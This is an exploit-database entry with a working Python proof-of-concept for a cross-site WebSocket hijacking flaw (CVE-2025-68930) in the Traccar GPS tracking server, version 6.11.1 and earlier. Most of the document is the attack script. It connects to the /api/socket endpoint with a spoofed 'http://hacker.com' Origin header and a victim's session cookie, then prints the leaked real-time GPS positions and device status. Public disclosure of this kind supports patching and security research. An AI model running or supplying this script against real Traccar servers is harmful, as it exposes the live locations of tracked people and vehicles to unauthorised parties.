Traccar GPS Tracking System 6.11.1 - Cross-Site WebSocket Hijacking (CSWSH)

Author: hazar
type: webapps
platform: multiple
port: 
date_added: 2026-05-04 
date_updated: 2026-05-04 
verified: 0 
codes: CVE-2025-68930 
tags: 
aliases:  
screenshot_url:  
application_url: 

# Exploit Title: Traccar GPS Tracking System 6.11.1 - Cross-Site WebSocket Hijacking (CSWSH)
# Date: 2026-02-26
# Exploit Author: Hazar Taspinar
# Vendor Homepage: https://www.traccar.org/
# Software Link: https://github.com/traccar/traccar
# Version: <= 6.11.1
# Tested on: Windows 11 / Linux
# CVE: CVE-2025-68930

"""
Description:
Traccar fails to validate the 'Origin' header in WebSocket connections (/api/socket).
An attacker can bypass the Same Origin Policy (SOP) by supplying a malicious Origin header
along with a victim's valid JSESSIONID. This allows the attacker to hijack the
WebSocket connection and leak real-time sensitive data, including GPS coordinates
and device status.

Requirements:
pip install websocket-client
"""

import websocket
import argparse
import sys

def on_message(ws, message):
    print(f"[+] DATA LEAKED: {message}")

def on_error(ws, error):
    print(f"[-] Error: {error}")

def on_close(ws, close_status_code, close_msg):
    print("[-] Connection closed.")

def on_open(ws):
    print("[*] WebSocket Handshake Successful!")
    print("[*] Connection upgraded. Streaming real-time sensitive data...\n")

def main():
    parser = argparse.ArgumentParser(description="Traccar CSWSH Exploit - Information Disclosure")
    parser.add_argument("--target", required=True, help="Target IP address (e.g., 192.168.1.5)")
    parser.add_argument("--port", default="8082", help="Target Port (default: 8082)")
    parser.add_argument("--cookie", required=True, help="Valid JSESSIONID (e.g., node0xxxxxxx)")

    args = parser.parse_args()

    # Construct the WebSocket URL
    url = f"ws://{args.target}:{args.port}/api/socket"

    # Malicious headers triggering the bypass
    # The 'Origin' header is set to an external domain to demonstrate lack of validation.
    headers = [
        "Origin: http://hacker.com",
        f"Cookie: JSESSIONID={args.cookie}"
    ]

    print(f"""
    ================================================
    TRACCAR GPS TRACKER - CSWSH EXPLOIT
    Exploit Author: Hazar Taspinar
    CVE: CVE-2025-68930
    Target: {url}
    ================================================
    """)

    # Initiate WebSocket connection
    ws = websocket.WebSocketApp(url,
                                on_message=on_message,
                                on_error=on_error,
                                on_close=on_close,
                                on_open=on_open,
                                header=headers)

    try:
        ws.run_forever()
    except KeyboardInterrupt:
        print("\n[*] Exploit stopped by user.")
        sys.exit(0)

if __name__ == "__main__":
    main()